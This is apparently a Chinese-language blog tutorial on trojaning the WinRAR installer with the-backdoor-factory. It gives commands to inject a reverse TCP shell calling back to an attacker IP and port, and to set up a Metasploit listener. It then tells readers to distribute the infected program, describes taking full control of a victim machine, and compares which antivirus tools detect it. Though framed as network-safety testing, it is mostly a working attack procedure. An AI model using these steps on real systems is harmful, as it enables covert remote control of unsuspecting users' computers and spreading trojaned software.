我們的網絡不安全
https://www.youtube.com/watch?v=nJF9OTscFiQ
這次我們用到的程式叫backdoor-factory,為完整的程式注入後門程式。具體的請網上檢視。
在kali linux系統上內建了該程式,但是注入後的程式顯示為空檔案(大小為0).故在ubuntu上手動安裝嘗試了一下,看我們的網絡是否夠安全。
注入
1.下載下傳程式
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
2.安裝
sudo chmod +x ./install.sh
3.運作
sudo ./backdoor.py
4.選擇目标檔案
本次使用的軟體為 https://rarlab.com/rar/winrar-x64-561.exe
之後将在此程式中注入後門
執行
./babackdoor.py -f winrar-x64-561.exe -S
可以看到此程式支援代碼注入
./babackdoor.py -f winrar-x64-561.exe -s show
檢視支援哪幾種注入方式
5.開始注入
./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234
reverse_shell_tcp_inline 注入方式
172.17.170.38 攻擊者ip,之後受害者主機來通路該ip
1234 攻擊者端口,之後受害者主機來通路該端口
選擇注入的位置:
都可以,這裡我們選擇2
完成。可以在指定目錄下找到該檔案。
到這裡就注入完成了。
控制
伺服器等待中招的pc連接配接。
設定伺服器。打開kali linux系統。
#msfconsole
msf> use multi/handler
msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set LHOST 172.17.170.38
msf exploit(handler) > exploit
将注入好的程式散發出去。如果有計算機不幸中招。
當有中招的pc代開注入後門的程式後,伺服器端會有響應。
可以看到172.17.172.223連入伺服器。這時候,你就可以全權控制223這台主機了。
可以看到被控制的主機資訊。(編碼格式可能不對,出現亂碼)
測試
對于注入後門程式的程式,會不會成功被檢測到呢。我用的火絨殺毒,輕按兩下之後立馬報警。
對于其他防毒軟體看看什麼情況,可以看到能夠清除到此後門的防毒軟體并不多。
實際上,該程式官網下載下傳的源檔案也可能會被誤殺
殺毒可以參考網站:
http://www.virscan.org/language/zh-cn/
https://www.virustotal.com/zh-cn/
參考
利用BDF向EXE檔案植入後門
Backdoor factory – How to inject shell-code into windows application
Kali Linux 滲透測試 部落格記錄